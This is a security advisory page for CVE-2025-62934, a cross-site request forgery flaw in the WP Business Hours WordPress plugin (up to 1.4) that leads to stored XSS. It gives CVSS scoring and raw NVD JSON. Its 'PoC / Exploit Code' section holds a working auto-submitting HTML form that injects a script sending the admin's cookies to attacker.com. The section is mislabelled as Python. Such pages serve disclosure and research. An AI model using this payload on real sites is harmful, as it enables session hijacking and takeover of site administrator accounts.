Security Vulnerability Report
中文
CVE-2025-62934 CVSS 7.1 HIGH

CVE-2025-62934

Published: 2025-10-27 02:15:53
Last Modified: 2026-04-27 17:16:36

Description

Cross-Site Request Forgery (CSRF) vulnerability in Mejar WP Business Hours wp-business-hours allows Stored XSS.This issue affects WP Business Hours: from n/a through <= 1.4.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WP Business Hours <= 1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62934: WP Business Hours CSRF to Stored XSS --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-62934</title> </head> <body> <h1>CVE-2025-62934 PoC</h1> <p>This PoC demonstrates the CSRF vulnerability in WP Business Hours plugin.</p> <form action="http://target-wordpress-site/wp-admin/admin.php?page=wp-business-hours" method="POST" id="csrf-form"> <input type="hidden" name="wp_business_hours_monday_open" value="09:00"> <input type="hidden" name="wp_business_hours_monday_close" value="17:00"> <input type="hidden" name="wp_business_hours_tuesday_open" value="09:00"> <input type="hidden" name="wp_business_hours_tuesday_close" value="17:00"> <!-- XSS payload in business hours field --> <input type="hidden" name="wp_business_hours_wednesday_open" value="<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>"> <input type="hidden" name="wp_business_hours_wednesday_close" value="17:00"> <input type="hidden" name="wp_business_hours_status" value="1"> <input type="hidden" name="wp_business_hours_save" value="Save Settings"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrf-form').submit(); </script> <p>If you see this message, the attack request has been sent.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62934", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:53.250", "lastModified": "2026-04-27T17:16:35.557", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Mejar WP Business Hours wp-business-hours allows Stored XSS.This issue affects WP Business Hours: from n/a through <= 1.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-business-hours/vulnerability/wordpress-wp-business-hours-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}